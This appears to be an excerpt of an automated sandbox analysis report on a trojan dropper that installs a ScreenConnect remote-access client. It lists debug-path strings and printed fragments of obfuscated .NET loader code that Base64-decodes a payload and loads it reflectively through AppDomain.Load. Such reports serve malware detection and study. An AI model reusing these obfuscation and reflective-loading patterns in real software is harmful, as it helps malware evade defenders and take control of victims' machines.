                        Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000010.00000002.2476011004.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1345183979.000000001B092000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1340922647.0000000002761000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1340770610.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.4.dr
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000009.00000000.1274135005.000000000072D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.4.dr
                        Source: Binary string: mscorlib.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000006.00000003.1253348099.0000000004A40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004BBE000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.6.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1347089184.000000001B6B2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll.6.dr, ScreenConnect.Windows.dll.4.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.6.dr
                        Source: Binary string: System.Management.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.6.dr
                        Source: Binary string: System.Management.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Core.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.6.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: MSI49E0.tmp.4.dr, 4e450e.msi.4.dr, 4e450d.rbs.4.dr, MSI473E.tmp.4.dr, MSI475F.tmp.4.dr, 4e450c.msi.4.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1347089184.000000001B6B2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll.6.dr, ScreenConnect.Windows.dll.4.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.4.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.WindowsClient.exe.4.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1345010311.000000001B032000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.4.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.WindowsClient.exe.4.dr
                        Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: 4e450e.msi.4.dr, MSI41FF.tmp.3.dr, 4e450c.msi.4.dr, ex.msi.0.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1345010311.000000001B032000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.4.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.4.dr
                        Source: Binary string: System.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER4F0E.tmp.dmp.14.dr

                        Data Obfuscation

                        barindex
                        Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{aOY1LHkSxcz7bCNxQCW.QTIsxKUHJ0UN309CpAk,aOY1LHkSxcz7bCNxQCW.DrQrVILTJzR8hUEKldd,aOY1LHkSxcz7bCNxQCW.g6UmqRqXwr9pllK5jAZ,aOY1LHkSxcz7bCNxQCW._9vGRyIMVLwnlolqKp5T,j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.QvzeYUYZaaQxbjwzwPliU2zXV0RFlM6Okms4yBVoP3ysFnxEzbA()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KbcQIqT9UJeYYtEQDuK[2],j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu._05eknny47V4wElsVNc2lijPDP6IJCG32n1Q08VG6pUCJKBcDESc(Convert.FromBase64String(KbcQIqT9UJeYYtEQDuK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{aOY1LHkSxcz7bCNxQCW.QTIsxKUHJ0UN309CpAk,aOY1LHkSxcz7bCNxQCW.DrQrVILTJzR8hUEKldd,aOY1LHkSxcz7bCNxQCW.g6UmqRqXwr9pllK5jAZ,aOY1LHkSxcz7bCNxQCW._9vGRyIMVLwnlolqKp5T,j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.QvzeYUYZaaQxbjwzwPliU2zXV0RFlM6Okms4yBVoP3ysFnxEzbA()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KbcQIqT9UJeYYtEQDuK[2],j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu._05eknny47V4wElsVNc2lijPDP6IJCG32n1Q08VG6pUCJKBcDESc(Convert.FromBase64String(KbcQIqT9UJeYYtEQDuK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{aOY1LHkSxcz7bCNxQCW.QTIsxKUHJ0UN309CpAk,aOY1LHkSxcz7bCNxQCW.DrQrVILTJzR8hUEKldd,aOY1LHkSxcz7bCNxQCW.g6UmqRqXwr9pllK5jAZ,aOY1LHkSxcz7bCNxQCW._9vGRyIMVLwnlolqKp5T,j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.QvzeYUYZaaQxbjwzwPliU2zXV0RFlM6Okms4yBVoP3ysFnxEzbA()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KbcQIqT9UJeYYtEQDuK[2],j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu._05eknny47V4wElsVNc2lijPDP6IJCG32n1Q08VG6pUCJKBcDESc(Convert.FromBase64String(KbcQIqT9UJeYYtEQDuK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs.Net Code: ekkHJ3mmuD9PGoANEu1 System.AppDomain.Load(byte[])
                        Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs.Net Code: VDzxT4Q84X0csXGwfVo System.AppDomain.Load(byte[])
                        Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs.Net Code: VDzxT4Q84X0csXGwfVo
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: ekkHJ3mmuD9PGoANEu1 System.AppDomain.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: VDzxT4Q84X0csXGwfVo System.AppDomain.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: VDzxT4Q84X0csXGwfVo
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: ekkHJ3mmuD9PGoANEu1 System.AppDomain.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: VDzxT4Q84X0csXGwfVo System.AppDomain.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs.Net Code: VDzxT4Q84X0csXGwfVo
                        Source: ScreenConnect.Client.dll.4.drStatic PE information: 0x94F102E7 [Mon Mar 8 13:28:07 2049 UTC]
                        Source: MSI41FF.tmp.3.drStatic PE information: real checksum: 0x2f213 should be: 0x1125d0
                        Source: XClient.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x16f10
                        Source: ScreenConnect.WindowsAuthenticationPackage.dll.4.drStatic PE information: section name: _RDATA
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeCode function: 0_2_00007FF88B1F00BD pushad ; iretd 0_2_00007FF88B1F00C1
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 2_2_00007FF88B2000BD pushad ; iretd 2_2_00007FF88B2000C1
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_01187732 push eax; iretd 9_2_01187739
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_01187752 push 8403E6CFh; iretd 9_2_01187759
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_055CBD00 push eax; iretd 9_2_055CBD01
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_055CBD03 pushad ; iretd 9_2_055CBD19
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_05AC4020 push esp; ret 9_2_05AC4033
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B2100BD pushad ; iretd 16_2_00007FF88B2100C1
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B2200BD pushad ; iretd 19_2_00007FF88B2200C1
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B532061 push ds; iretd 19_2_00007FF88B532068
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 5Q3MO7HER4QVrhh3m4LI7MNWRpF0DKBUqy.csHigh entropy of concatenated method names: 'SBFDL8w68lckIYyO9Cnvs01QkKyPaPbV0G', 'ycW4NY88LzYVFAmMPBn1ezA0fq3JZ2BiBj', 'LFAskUx5Ob3nTmgK9BeCl7sypeLJGncKa2', 'QkERNOiIwJnUE6KPE8BF7cpnckjrUa3QLe', 'ltpfuyZWogm8aCeOI0OUT4GqmXEELowxMd', 'EZqPrfxyhNe5frUfRSEpqH6189WA5RLAFM', 'Z3c03WvXkn1YRArRBjOPs7laTNHAMVEV63', 'c26M0KZ10RoR0LYOiUxhZWjvhovAYkfH56', '_6PBwoJGJLF000Yiij75KjZwYfACWnFi5gl', 'ioWfH07YJ0aulaPuTm0RIuzN62dyCe1Nkt'
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, rHvdV02fL5QQLikiFsJ4PSRd1PV4WYViYz.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'TWcJGkiGMqpnoiZgAKlhoM90Nk7l26Tr9Z', 'luoj1v0s5I433cYGVpbLKljY87vHoLUGbk', 'm2A9ZzynKme0hEqv9ddmTqDzqqIKImeqLK', 'TQplzSO0Te4723tw5n3PH8sWqVJ6rLPOOR'
                        Source: XClient.exe.0.dr, ipQBGHtOli8FsdvUrICHUQGCaKXp4kZTzUvcHh0kSfN96VRQKcE.csHigh entropy of concatenated method names: 'pat8Jmb6Y3fVcrPtL1Z4Geu2isETsDV2vCvSXt7Mg6i29bkYoh5', '_9LqgpCT0wm8b8wMEwuxQSLp7cNVNA2rkOYUEtOQu4YBBcNSdPME', 'WIl9K3WqOPWOcIYEfxMtSAh1HbUmrzbaLurxMvynPc32WtcmiTj', 'a5kzdzg3HLQ', 'Ht3WasYKPuj', 'pnyv45Hy8LS', 'eUKfGQ0ryft', '_2ZyucE7JLEh', '_6DsE6k9MkQE', 'CLgQaZa1q5v'
                        Source: XClient.exe.0.dr, aOY1LHkSxcz7bCNxQCW.csHigh entropy of concatenated method names: 'WxXahuCOFEVUX8YwHBXgUzre8PPvZOccVGWnV', 'udJnGVG5BX8a0x17De5vjBisXASL4It0rpgad', 'f4P382k0bLtGwSaO4LWwtjLcqFEJweaLp8QR7', '_533lYKmbIIoU0cbbDLfDd8kxGQT2GmNBJwCjD'
                        Source: XClient.exe.0.dr, ZCpsIWfDS7AkpK9SKjuwhH4KkL4LSGD6th7sJ2hAa0ZVEq51hCmhMVSafkw7M38e5XZLdMicldIn7.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZYOKKT5w3GBHY4kJne8wizAtzWeXZgDGGuLUC', '_9dlIsfrCf1uOpOVJYiWUu49AQOhS4OiQ16y4W', 'PvbdRdJbGx4288CxPeLwEkTqpsm7pB2BGNFZq', 'aaZGIVo6wJtASEnwPZ9Sy1qATExnWIlI0tA1j'
                        Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.csHigh entropy of concatenated method names: 'HmKj8f2UpIC4WXD6cga', 'ekkHJ3mmuD9PGoANEu1', 'idLGquPdixZnDbopEyB', 'mTRqbYcTSOZyBbB5FeH', 'YyGs8eE9dPBhF3MiPv9', 'bmgAcruG4jlqHQTwrvy', 'wpTgTsMVrYjXW16ueio', 'ndiNw4k0g7M1AMgqMhk', 'UPo6MGr04FyiFQxxqTz', 'aBOp4u9COf4kMyc6NNq'
                        Source: XClient.exe.0.dr, R6ucxiO1Ll9Uiqd2r7r.csHigh entropy of concatenated method names: '_2DLzGtrM3rdImQqlpGK', 'R53XZECzmMWs6gnGM3H', 'JNTme6KWPk1e3Hl5ynq', 'k5EjjSL9ZIpNjValRcPI73Fx3HbJWJxdYSNjMpg6XT7c8TqhEU6FJM9qgqrxtFJkj2Y7V', 'XuxW4ZTdl5WlSDTTMKnxDhSVuPoCC8rroUUhOohbm8nWBXeV6sGnksKuARPDdV2x9zAq2', 'qXSc4n77SNw94UtawAlPPdHxkPJpxdy14TQRZ7CiJ1QMVU2YmQM703BdtZrKSFk7lPy5f', 'XjYcSsOuP4PnE1LxjSQ80zukitMlsHPeoR0Ua0K0dwXMYSr7JptKNEApoJhkmk4zM9n3m', 'yKwussRCHNLBnDyfF2elQQ99RkoBIFN9mU5BoD7UMdAUQ3Vwqr6TCRP5bHPwzdgyRk9yU', 'AtWYBfFnnwqCRxvYCTGWRtwHT2zQy3E1TATaP1R1IqvgKt44cx8fQLupK0iVG7lySsoy0', 'XxCPjcMW4umdDOse8GoyFMrGJn1MpBAEePzdcnMp9t8US7KMhFK63tUwml7flJepB3sX4'
                        Source: XClient.exe.0.dr, bBpHSt10PQXanEg3s65.csHigh entropy of concatenated method names: 'njbTfylSdh3DVkASU8B', 'wRFqwzdmUb398NB0tjqKIKNj3HO0IRF4iM5ueNx4DY2RemWHOJLVvukBwaV7YCprtAJzT', '_9HUcVNIFqE5V4cBpmXXwSZJOXL1J4NkPrXWnqLt2jShO2LxV93cnJK1c3UMCWuEUp088A', 'iVajpGwq8QPObtQWs2QCLAm774ZD5AiXepguxghvobo5ckcWCzHt3njKFDd5C2H1MvLP8', 'zPns4ysKQVFejKfpplQBYHFBQDHmuYYH1V8YnTlEWuPtnaT19ycSING03dCltijQTOyHG'
                        Source: XClient.exe.0.dr, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csHigh entropy of concatenated method names: 'lMhAN6ieJ9Gj270e3d8l6EuzAUMBNqU7e0PkHcPWsXpFDOT4aDU', 'pITcJHMfLgAJyx2Plpdek5MwZq8QVL1NSfSte1xuToKigzfYhcM', 'X1N6QbUIdblD5ej3yrD1RpCoqH3zqdiwRAenKuHF2kj5bOgN27i', 'jQQEALPZoWpqfBYUXcnOJYScRP9IKN6eaMSmYGZcGsuIJwFxqBz', 'SF1GVCK8i8RGOjTFnFTwxYgNFLa4bV4oZBDmuyRSJlNPAXhbCZf', 'WsJcizhaoEcEAhJ4UE3sbrrsyBWJUV9y6ZYWGIf3N1eRJ9ENYmy', 'OfJY8JSodSrSeYJVXlHsLlQEvNdYYECBtYFnHnaB2zBsSsgpRxo', 'U5WHrHeluK7MpFqfL1PH9OkYhID0nZvE5eZY900wzHRUCc8kDrQ', 'dLy8Y9KJmGOzLl60X5AyBd0RXwBeExMJjcoGfhAc8mbTMzjaMX4', 'Kb3IrrhexuigkuRmIfSWyqQNvWLa6DxOfV0kOrcSu8XB8BytlEB'
                        Source: XClient.exe.0.dr, dsUdPXhp5sK8qnlF2Z8.csHigh entropy of concatenated method names: 'hu9IREyIUh7b9tqrTwH', 'q5tdLTJOCx538rWyVxP', 'GAyvJAV3BqIFycyTBhK', 'LII6FqpHgazlxktlAO3', 'JcWQpZU9DeZrpN3z0XO', 'AvF7gTZZ984KiKpgVQE', 'clk2pToYFRt1nb6AAUj', '_6fjYweCLJHPkRTYeZuV', 'P9pDEcOMz199mTqUmf7', 'w6AGO8ujJxryr9R3Yl8'
                        Source: XClient.exe.0.dr, tLU2VSaMPJVr9yYF210.csHigh entropy of concatenated method names: '_8Dv9Vs0yYdsXpix8YZ5', '_33mfWWmtXmIFlbwYjbP', 'fyV6ElXjQFVoD7Yg3kF', '_0BDIFbEntewBARUJ4AW', 'fqIvHQf6rAwJUitJOP8', '_95cb8wIZ0IiuEdW06pv', 'vofk0Ebiv5msx02tB68', 'ANjcVj4YuJXZH1VS6tu', 'i7usY4bVPNyXwaMZ5Ju', 's0jWpDKqEC1xDlifl9S'
                        Source: XClient.exe.0.dr, 5XWegNUSYQmoH9YsXWwL3Z5IjscWBkw0lURjMwsQ9tAyS4PHWjw.csHigh entropy of concatenated method names: 'LWDWjlJsqySwJDhxKwnA1ob1nnOruYHv9gzUB79qBivHrjTnney', 'Y0VjIJJmphFLtNgnVRlJtkb6Zvac4d8CsGISBXZvh4UUkyJFWZK', 'rC50bPsbhHc', 'ZCzCuMnDJHI', 'dNNMngHzGun', 'KkeGQAswrfy'
                        Source: XClient.exe.0.dr, 9mKnnIJtPQLqnwuwN1X.csHigh entropy of concatenated method names: 'eWyI97yyAY8tIl80q4N', '_1dQrlFoEc0nmRImvsgz', '_0cHWb2aV6xgzjJsjWcI', 'Q5p8BUNetdTWjQBMuQe', 'xZLnEQZRC0RP8JfNkXV', 'EV5O9Od9dWdTAgnAIFf', 'Hcv1gbLjQkP5jymonLm', '_46t0mKTweJXPdiP4vnI', 'DmQzLGXanTZDm5YW6W5t3kBYYhBr81G4QE92ZruwFYaHVASOM5T', '_81I9aQAGvNUhA6REsbvamffB0q2JhjBD4Poo3E4Kv3xJdmaKzK1'
                        Source: XClient.exe.0.dr, xlOlMInMQpmeBLv2Td7q6lNkfsP2MFkqfuNevjXRwqob1nCSpZW.csHigh entropy of concatenated method names: 'zHqvhuLG3DMOxlZdsTXjrI8UgLF7nmFNxZLihWZnWCXahOtHf0U', 'iMWGDPZByTOs606Zhm1RtdYkO4BkCLldZDD1INwoNnlFpui3dVU', 'xGnaDo0bmxRAlqiv1AKIb2U13PWHwEAKXVU0alG8Kn47vh5P8gY', 'hWr0UVh8hAMIAlHTTh7zBHwmMBHpI9Xn2Bnxy5dG80yQoq2l4ic', 'YAZvi16fJEn', '_3f2Tt8ab2V3', 'vyuWNSKG9jS', 'rQMkjoOKIcj', 'hdA0o0L81xT', '_9nXD0KODXut'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, ipQBGHtOli8FsdvUrICHUQGCaKXp4kZTzUvcHh0kSfN96VRQKcE.csHigh entropy of concatenated method names: 'pat8Jmb6Y3fVcrPtL1Z4Geu2isETsDV2vCvSXt7Mg6i29bkYoh5', '_9LqgpCT0wm8b8wMEwuxQSLp7cNVNA2rkOYUEtOQu4YBBcNSdPME', 'WIl9K3WqOPWOcIYEfxMtSAh1HbUmrzbaLurxMvynPc32WtcmiTj', 'a5kzdzg3HLQ', 'Ht3WasYKPuj', 'pnyv45Hy8LS', 'eUKfGQ0ryft', '_2ZyucE7JLEh', '_6DsE6k9MkQE', 'CLgQaZa1q5v'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, aOY1LHkSxcz7bCNxQCW.csHigh entropy of concatenated method names: 'WxXahuCOFEVUX8YwHBXgUzre8PPvZOccVGWnV', 'udJnGVG5BX8a0x17De5vjBisXASL4It0rpgad', 'f4P382k0bLtGwSaO4LWwtjLcqFEJweaLp8QR7', '_533lYKmbIIoU0cbbDLfDd8kxGQT2GmNBJwCjD'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, ZCpsIWfDS7AkpK9SKjuwhH4KkL4LSGD6th7sJ2hAa0ZVEq51hCmhMVSafkw7M38e5XZLdMicldIn7.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZYOKKT5w3GBHY4kJne8wizAtzWeXZgDGGuLUC', '_9dlIsfrCf1uOpOVJYiWUu49AQOhS4OiQ16y4W', 'PvbdRdJbGx4288CxPeLwEkTqpsm7pB2BGNFZq', 'aaZGIVo6wJtASEnwPZ9Sy1qATExnWIlI0tA1j'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.csHigh entropy of concatenated method names: 'HmKj8f2UpIC4WXD6cga', 'ekkHJ3mmuD9PGoANEu1', 'idLGquPdixZnDbopEyB', 'mTRqbYcTSOZyBbB5FeH', 'YyGs8eE9dPBhF3MiPv9', 'bmgAcruG4jlqHQTwrvy', 'wpTgTsMVrYjXW16ueio', 'ndiNw4k0g7M1AMgqMhk', 'UPo6MGr04FyiFQxxqTz', 'aBOp4u9COf4kMyc6NNq'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, R6ucxiO1Ll9Uiqd2r7r.csHigh entropy of concatenated method names: '_2DLzGtrM3rdImQqlpGK', 'R53XZECzmMWs6gnGM3H', 'JNTme6KWPk1e3Hl5ynq', 'k5EjjSL9ZIpNjValRcPI73Fx3HbJWJxdYSNjMpg6XT7c8TqhEU6FJM9qgqrxtFJkj2Y7V', 'XuxW4ZTdl5WlSDTTMKnxDhSVuPoCC8rroUUhOohbm8nWBXeV6sGnksKuARPDdV2x9zAq2', 'qXSc4n77SNw94UtawAlPPdHxkPJpxdy14TQRZ7CiJ1QMVU2YmQM703BdtZrKSFk7lPy5f', 'XjYcSsOuP4PnE1LxjSQ80zukitMlsHPeoR0Ua0K0dwXMYSr7JptKNEApoJhkmk4zM9n3m', 'yKwussRCHNLBnDyfF2elQQ99RkoBIFN9mU5BoD7UMdAUQ3Vwqr6TCRP5bHPwzdgyRk9yU', 'AtWYBfFnnwqCRxvYCTGWRtwHT2zQy3E1TATaP1R1IqvgKt44cx8fQLupK0iVG7lySsoy0', 'XxCPjcMW4umdDOse8GoyFMrGJn1MpBAEePzdcnMp9t8US7KMhFK63tUwml7flJepB3sX4'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, bBpHSt10PQXanEg3s65.csHigh entropy of concatenated method names: 'njbTfylSdh3DVkASU8B', 'wRFqwzdmUb398NB0tjqKIKNj3HO0IRF4iM5ueNx4DY2RemWHOJLVvukBwaV7YCprtAJzT', '_9HUcVNIFqE5V4cBpmXXwSZJOXL1J4NkPrXWnqLt2jShO2LxV93cnJK1c3UMCWuEUp088A', 'iVajpGwq8QPObtQWs2QCLAm774ZD5AiXepguxghvobo5ckcWCzHt3njKFDd5C2H1MvLP8', 'zPns4ysKQVFejKfpplQBYHFBQDHmuYYH1V8YnTlEWuPtnaT19ycSING03dCltijQTOyHG'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csHigh entropy of concatenated method names: 'lMhAN6ieJ9Gj270e3d8l6EuzAUMBNqU7e0PkHcPWsXpFDOT4aDU', 'pITcJHMfLgAJyx2Plpdek5MwZq8QVL1NSfSte1xuToKigzfYhcM', 'X1N6QbUIdblD5ej3yrD1RpCoqH3zqdiwRAenKuHF2kj5bOgN27i', 'jQQEALPZoWpqfBYUXcnOJYScRP9IKN6eaMSmYGZcGsuIJwFxqBz', 'SF1GVCK8i8RGOjTFnFTwxYgNFLa4bV4oZBDmuyRSJlNPAXhbCZf', 'WsJcizhaoEcEAhJ4UE3sbrrsyBWJUV9y6ZYWGIf3N1eRJ9ENYmy', 'OfJY8JSodSrSeYJVXlHsLlQEvNdYYECBtYFnHnaB2zBsSsgpRxo', 'U5WHrHeluK7MpFqfL1PH9OkYhID0nZvE5eZY900wzHRUCc8kDrQ', 'dLy8Y9KJmGOzLl60X5AyBd0RXwBeExMJjcoGfhAc8mbTMzjaMX4', 'Kb3IrrhexuigkuRmIfSWyqQNvWLa6DxOfV0kOrcSu8XB8BytlEB'
